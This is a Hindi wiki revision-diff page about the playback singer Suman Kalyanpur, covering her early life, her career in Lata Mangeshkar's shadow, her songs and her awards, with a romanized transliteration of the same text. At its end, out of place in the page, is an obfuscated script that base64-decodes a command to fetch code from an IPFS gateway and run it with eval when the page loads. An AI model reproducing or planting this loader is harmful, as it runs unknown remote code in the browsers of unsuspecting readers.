Difference between revisions of "सुमन कल्याणपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 30: Line 30:
 
|अद्यतन={{अद्यतन|17:44, 18 जून 2017 (IST)}}
 
|अद्यतन={{अद्यतन|17:44, 18 जून 2017 (IST)}}
 
}}
 
}}
'''सुमन कल्याणपुर''' ([[अंग्रेज़ी]]: Suman Kalyanpur, जन्म- [[28 जनवरी]], [[1937]], ढाका) पार्श्व गायिका है।  इनकी हिन्दी फिल्म संगीत में दशा दोधारी चाकू की तरह रही है, जो दोनों ओर से चीजों को काटता है। अपनी अच्छी आवाज के बावजूद सुमन को फिल्मों में संगीतकारों ने अधिक अवसर इसलिए नहीं दिए क्योंकि उनकी आवाज हूबहू लता से मिलती थी। जब बाजार में ओरिजिनल आवाज उपलब्ध हो, तो डुप्लिकेट को कोई क्यों कर मौका देने लगे। सुमन का फिल्मों में आगमन भी ऐसे दौर में हुआ, जब [[लता मंगेशकर|लता]] के खनकते कलदार सिक्के चलते थे। कोई संगीतकार लता के विरुद्ध सुमन से गवाने की हिमाकत कैसे कर सकता था। इसलिए सुमन चुपचाप हमेशा दूसरी कतार में खड़ी रहकर अपने नियति को दबे होंठ ताउम्र स्वीकारती रही। उन्हें लता का क्लोन बना दिया गया।<ref name="aa"/>
+
'''सुमन कल्याणपुर''' ([[अंग्रेज़ी]]: Suman Kalyanpur, जन्म- [[28 जनवरी]], [[1937]], ढाका) पार्श्व गायिका है।  इनकी हिन्दी फ़िल्म संगीत में दशा दोधारी चाकू की तरह रही है, जो दोनों ओर से चीजों को काटता है। अपनी अच्छी आवाज के बावजूद सुमन को फ़िल्मों में संगीतकारों ने अधिक अवसर इसलिए नहीं दिए क्योंकि उनकी आवाज हूबहू लता से मिलती थी। जब बाजार में ओरिजिनल आवाज उपलब्ध हो, तो डुप्लिकेट को कोई क्यों कर मौका देने लगे। सुमन का फ़िल्मों में आगमन भी ऐसे दौर में हुआ, जब [[लता मंगेशकर|लता]] के खनकते कलदार सिक्के चलते थे। कोई संगीतकार लता के विरुद्ध सुमन से गवाने की हिमाकत कैसे कर सकता था। इसलिए सुमन चुपचाप हमेशा दूसरी कतार में खड़ी रहकर अपने नियति को दबे होंठ ताउम्र स्वीकारती रही। उन्हें लता का क्लोन बना दिया गया।<ref name="aa"/>
 
==परिचय==
 
==परिचय==
 
{{main|सुमन कल्याणपुर का परिचय}}
 
{{main|सुमन कल्याणपुर का परिचय}}
सुमन का जन्म [[28 जनवरी]] [[1937]] को ढाका (बंगला देश की वर्तमान राजधानी) में हुआ। पिता बैंक अधिकारी थे। [[1943]] में [[मुंबई]] आने पर पढ़ाई तथा संगीत का प्रशिक्षण यही लिया। अपने गुरु यशवंत देव से बाकायदा संगीत सीखा। उन्होंने ही मराठी फिल्म शुक्राची चांदनी में पहली बार गवाया। किस्मत यहां भी दगा दे गई। यह फिल्म में शामिल नहीं हुआ। लेकिन संगीतकार मोहम्मद शफी ने सुमन को फिल्म मंगू में गाने के अवसर दिए। सन था [[1954]] और सुमन की उम्र थी 17 साल। फिर किस्मत ने झपट्टा मारा, निर्माता ने संगीतकार को फिल्म के अधबीच में बदल लिया। उनका स्थान ओपी नय्यर ने लिया। ओपी को गीता दत्त, आशा भोंसले तथा शमशाद की मोटी आवाज पसंद थी। उन्होंने सुमन का सिर्फ एक गीत फिल्म में रखा-कोई पुकारे धीरे से तुझे। इसी साल संगीतकार नाशाद के निर्देशन में फिल्म दरवाजा में पांच गीत गाकर अपना पैर मजबूती से जमाया। इस दौर में वह सुमन हेमाड़ी थी। [[मुंबई]] के व्यापारी रामानंद कल्याणपुर से शादी के बाद वह सुमन कल्याणपुर हो गईं।<ref name="aa"/>
+
सुमन का जन्म [[28 जनवरी]] [[1937]] को ढाका (बंगला देश की वर्तमान राजधानी) में हुआ। पिता बैंक अधिकारी थे। [[1943]] में [[मुंबई]] आने पर पढ़ाई तथा संगीत का प्रशिक्षण यही लिया। अपने गुरु यशवंत देव से बाकायदा संगीत सीखा। उन्होंने ही मराठी फ़िल्म शुक्राची चांदनी में पहली बार गवाया। किस्मत यहां भी दगा दे गई। यह फ़िल्म में शामिल नहीं हुआ। लेकिन संगीतकार मोहम्मद शफी ने सुमन को फ़िल्म मंगू में गाने के अवसर दिए। सन था [[1954]] और सुमन की उम्र थी 17 साल। फिर किस्मत ने झपट्टा मारा, निर्माता ने संगीतकार को फ़िल्म के अधबीच में बदल लिया। उनका स्थान ओपी नय्यर ने लिया। ओपी को गीता दत्त, आशा भोंसले तथा शमशाद की मोटी आवाज पसंद थी। उन्होंने सुमन का सिर्फ एक गीत फ़िल्म में रखा-कोई पुकारे धीरे से तुझे। इसी साल संगीतकार नाशाद के निर्देशन में फ़िल्म दरवाजा में पांच गीत गाकर अपना पैर मजबूती से जमाया। इस दौर में वह सुमन हेमाड़ी थी। [[मुंबई]] के व्यापारी रामानंद कल्याणपुर से शादी के बाद वह सुमन कल्याणपुर हो गईं।<ref name="aa"/>
 
==कॅरियर==
 
==कॅरियर==
 
{{main|सुमन कल्याणपुर का फ़िल्मी कॅरियर}}
 
{{main|सुमन कल्याणपुर का फ़िल्मी कॅरियर}}
एक समय एचएमवी ने 50 प्रेम-गीतों के चार कैसेट्स जारी किए थे। उनमें अधिकतम सात गीत सुमन द्वारा गाए हुए थे। किशोर, रफी, तलत, मन्ना डे, गीता दत्त, हेमंत कुमार सब उनके पीछे थे। कैसेट कवर पर सबके फोटो छापे गए मगर सुमन का फोटो एक कैसेट पर भी नहीं था। यह कुछ उसी तरह की घटना है कि जायज टिकट के बावजूद बस कण्डक्टर मुसाफिर को सरे राह उतार दे। सुमन के पार्श्वगायन के करियर में सत्तर के दशक में बसंती बयार ने शीतल हवा के झोंकों से उन्हें शांति प्रदान की थी। गीतों की रायल्टी को लेकर रफी-लता में मनमुटाव चल रहा था। दोनों ने साथ गाना छोड़ दिया था। सुमन को इस दशक में 170 फिल्मों में गाने का मौका मिला। इस दौर में सुमन के उम्दा गीत सामने आए। जैसे- दिल एक मंदिर है (दिल एक मंदिर), अगर तेरी जलवानुमाई न होती (बेटी-बेटे), तुमने पुकारा और हम चले आए (राजकुमार), अजहुं न आए बालमा सावन बीता जाए (सांझ और सबेरा) तथा आजकल तेरे मेरे प्यार के चर्चे हर जुबान पर (ब्रह्मचारी), लेकिन बाद में रफी-लता में समझौता होते ही पुरानी स्थिति लौट आई।<ref name="aa">{{cite web |url=http://hindi.webdunia.com/bollywood-focus/suman-kalyanpur-lata-mangeshkar-samay-tamrakar-116061800058_1.html|title=सुमन कल्याणपुर : इक जुर्म करके हमने चाहा था मुस्कुराना....|accessmonthday=[[18 जून]] |accessyear=[[2017]] |last= |first= |authorlink=|format= |publisher=webdunia.com|language=[[हिन्दी]]}}</ref>  
+
एक समय एचएमवी ने 50 प्रेम-गीतों के चार कैसेट्स जारी किए थे। उनमें अधिकतम सात गीत सुमन द्वारा गाए हुए थे। किशोर, रफी, तलत, मन्ना डे, गीता दत्त, हेमंत कुमार सब उनके पीछे थे। कैसेट कवर पर सबके फोटो छापे गए मगर सुमन का फोटो एक कैसेट पर भी नहीं था। यह कुछ उसी तरह की घटना है कि जायज टिकट के बावजूद बस कण्डक्टर मुसाफिर को सरे राह उतार दे। सुमन के पार्श्वगायन के करियर में सत्तर के दशक में बसंती बयार ने शीतल हवा के झोंकों से उन्हें शांति प्रदान की थी। गीतों की रायल्टी को लेकर रफी-लता में मनमुटाव चल रहा था। दोनों ने साथ गाना छोड़ दिया था। सुमन को इस दशक में 170 फ़िल्मों में गाने का मौका मिला। इस दौर में सुमन के उम्दा गीत सामने आए। जैसे- दिल एक मंदिर है (दिल एक मंदिर), अगर तेरी जलवानुमाई न होती (बेटी-बेटे), तुमने पुकारा और हम चले आए (राजकुमार), अजहुं न आए बालमा सावन बीता जाए (सांझ और सबेरा) तथा आजकल तेरे मेरे प्यार के चर्चे हर जुबान पर (ब्रह्मचारी), लेकिन बाद में रफी-लता में समझौता होते ही पुरानी स्थिति लौट आई।<ref name="aa">{{cite web |url=http://hindi.webdunia.com/bollywood-focus/suman-kalyanpur-lata-mangeshkar-samay-tamrakar-116061800058_1.html|title=सुमन कल्याणपुर : इक जुर्म करके हमने चाहा था मुस्कुराना....|accessmonthday=[[18 जून]] |accessyear=[[2017]] |last= |first= |authorlink=|format= |publisher=webdunia.com|language=[[हिन्दी]]}}</ref>  
 
==पुरस्कार==
 
==पुरस्कार==
 
{{main|सुमन कल्याणपुर को पुरस्कार}}
 
{{main|सुमन कल्याणपुर को पुरस्कार}}
करीब 28 साल के अपने करियर में सुमन कल्याणपुर ने न सिर्फ पार्श्वगायन के क्षेत्र में अपना एक सम्मानजनक स्थान बनाया बल्कि रसरंग (नासिक) का 'फाल्के पुरस्कार' ([[1961]]), सुर सिंगार संसद का 'मियां तानसेन पुरस्कार' ([[1965]] और [[1970]]), 'महाराष्ट्र राय फिल्म पुरस्कार' ([[1965]] और [[1966]]), 'गुजरात राय फिल्म पुरस्कार' ([[1970]] से [[1973]] तक लगातार) जैसे करीब एक दर्जन पुरस्कार भी हासिल किए।
+
करीब 28 साल के अपने करियर में सुमन कल्याणपुर ने न सिर्फ पार्श्वगायन के क्षेत्र में अपना एक सम्मानजनक स्थान बनाया बल्कि रसरंग (नासिक) का 'फाल्के पुरस्कार' ([[1961]]), सुर सिंगार संसद का 'मियां तानसेन पुरस्कार' ([[1965]] और [[1970]]), 'महाराष्ट्र राय फ़िल्म पुरस्कार' ([[1965]] और [[1966]]), 'गुजरात राय फ़िल्म पुरस्कार' ([[1970]] से [[1973]] तक लगातार) जैसे करीब एक दर्जन पुरस्कार भी हासिल किए।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक=|पूर्णता=|शोध=}}
Line 47: Line 47:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पार्श्वगायक}}{{दादा साहब फाल्के पुरस्कार}}
+
{{पार्श्वगायक}}
[[Category:गायिका]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:संगीत कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:दादा साहब फाल्के पुरस्कार]]
+
[[Category:गायिका]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:संगीत कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:जीवनी साहित्य]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 12:06, 20 June 2017

suman kalyanapur
poora nam suman kalyanapur
janm 28 janavari, 1937
janm bhoomi dhaka
abhibhavak shankar rav hemadi
pati/patni ramanand kalyanapur
karm bhoomi mumbee
karm-kshetr film sangit (parshvagayika)
vishay bharatiy shastriy sangit, lok sangit, bhajan, gazal
puraskar-upadhi dada sahab phalke puraskar
nagarikata bharatiy
mukhy git ik jurm karake hamane chaha tha muskurana, parabatoan ke pe doan par, ye mausam rangin samaan, ajakal tere mere pyar ke charche har juban par
any janakari karib 28 sal ke apane kariyar mean suman kalyanapur ne parshvagayan ke kshetr mean apana ek sammanajanak sthan banaya.
adyatan‎

suman kalyanapur (aangrezi: Suman Kalyanpur, janm- 28 janavari, 1937, dhaka) parshv gayika hai. inaki hindi film sangit mean dasha dodhari chakoo ki tarah rahi hai, jo donoan or se chijoan ko katata hai. apani achchhi avaj ke bavajood suman ko filmoan mean sangitakaroan ne adhik avasar isalie nahian die kyoanki unaki avaj hoobahoo lata se milati thi. jab bajar mean orijinal avaj upalabdh ho, to dupliket ko koee kyoan kar mauka dene lage. suman ka filmoan mean agaman bhi aise daur mean hua, jab lata ke khanakate kaladar sikke chalate the. koee sangitakar lata ke viruddh suman se gavane ki himakat kaise kar sakata tha. isalie suman chupachap hamesha doosari katar mean kh di rahakar apane niyati ko dabe hoanth taumr svikarati rahi. unhean lata ka klon bana diya gaya.[1]

parichay

  1. REDIRECTsaancha:mukhy

suman ka janm 28 janavari 1937 ko dhaka (bangala desh ki vartaman rajadhani) mean hua. pita baiank adhikari the. 1943 mean muanbee ane par padhaee tatha sangit ka prashikshan yahi liya. apane guru yashavant dev se bakayada sangit sikha. unhoanne hi marathi film shukrachi chaandani mean pahali bar gavaya. kismat yahaan bhi daga de gee. yah film mean shamil nahian hua. lekin sangitakar mohammad shaphi ne suman ko film mangoo mean gane ke avasar die. san tha 1954 aur suman ki umr thi 17 sal. phir kismat ne jhapatta mara, nirmata ne sangitakar ko film ke adhabich mean badal liya. unaka sthan opi nayyar ne liya. opi ko gita datt, asha bhoansale tatha shamashad ki moti avaj pasand thi. unhoanne suman ka sirph ek git film mean rakha-koee pukare dhire se tujhe. isi sal sangitakar nashad ke nirdeshan mean film daravaja mean paanch git gakar apana pair majabooti se jamaya. is daur mean vah suman hema di thi. muanbee ke vyapari ramanand kalyanapur se shadi ke bad vah suman kalyanapur ho geean.[1]

kॅriyar

  1. REDIRECTsaancha:mukhy

ek samay echemavi ne 50 prem-gitoan ke char kaisets jari kie the. unamean adhikatam sat git suman dvara gae hue the. kishor, raphi, talat, manna de, gita datt, hemant kumar sab unake pichhe the. kaiset kavar par sabake photo chhape ge magar suman ka photo ek kaiset par bhi nahian tha. yah kuchh usi tarah ki ghatana hai ki jayaj tikat ke bavajood bas kandaktar musaphir ko sare rah utar de. suman ke parshvagayan ke kariyar mean sattar ke dashak mean basanti bayar ne shital hava ke jhoankoan se unhean shaanti pradan ki thi. gitoan ki rayalti ko lekar raphi-lata mean manamutav chal raha tha. donoan ne sath gana chho d diya tha. suman ko is dashak mean 170 filmoan mean gane ka mauka mila. is daur mean suman ke umda git samane ae. jaise- dil ek mandir hai (dil ek mandir), agar teri jalavanumaee n hoti (beti-bete), tumane pukara aur ham chale ae (rajakumar), ajahuan n ae balama savan bita jae (saanjh aur sabera) tatha ajakal tere mere pyar ke charche har juban par (brahmachari), lekin bad mean raphi-lata mean samajhauta hote hi purani sthiti laut aee.[1]

puraskar

  1. REDIRECTsaancha:mukhy

karib 28 sal ke apane kariyar mean suman kalyanapur ne n sirph parshvagayan ke kshetr mean apana ek sammanajanak sthan banaya balki rasarang (nasik) ka 'phalke puraskar' (1961), sur siangar sansad ka 'miyaan tanasen puraskar' (1965 aur 1970), 'maharashtr ray film puraskar' (1965 aur 1966), 'gujarat ray film puraskar' (1970 se 1973 tak lagatar) jaise karib ek darjan puraskar bhi hasil kie.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>